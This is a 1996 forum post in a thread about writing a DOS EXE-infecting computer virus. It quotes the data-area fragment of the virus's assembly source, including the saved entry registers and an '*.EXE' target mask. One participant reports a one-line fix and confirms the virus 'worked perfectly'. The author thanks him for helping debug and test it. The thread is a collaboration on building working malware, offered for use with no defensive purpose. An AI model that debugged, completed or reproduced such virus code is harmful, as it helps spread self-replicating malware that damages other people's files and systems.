Posted by Char on August 05, 1996 at 20:12:43:
In Reply to: Re: EXE infector, whole code posted by The Nihilist on August 05, 1996 at 07:17:49:
: : db 0eah
: : ;------DATA AREA-----------------------------------------------------
: : ORG_IP DW ?
: : ORG_CS DW ?
: : ORG_SP DW ?
: : ORG_SS DW ?
: : EXE_MASK DB '*.EXE',0
: : CARRIER_IP DW ?
: : CARRIER_CS DW 0FFF0H
: : CARRIER_SP DW ?
: : CARRIER_SS DW 0FFF0H
: : V_END:
: : NEW_DTA DB 43 DUP (?)
: : HEADER DB 1AH DUP (?)
: : REAL_END:
: : END MAIN
: : If you have another PC for testing virii,
: : could you please 'copy and paste' this virus
: : and test it at once. If you do not have,
: : just read it please.
: : Thank You Very Much!
: : Char
: Ok, I found the error, all you forgot to do was to
: change your code in area to
: CARRIER_IP DW 0
: I tested your virus with that one change and it
: worked perfectly under DOS. Besides that one
: little error, your virus was fine.
: The Nihilist
Yeah!! My virus works! Thank you so much for
helping me to debug and test it!
Char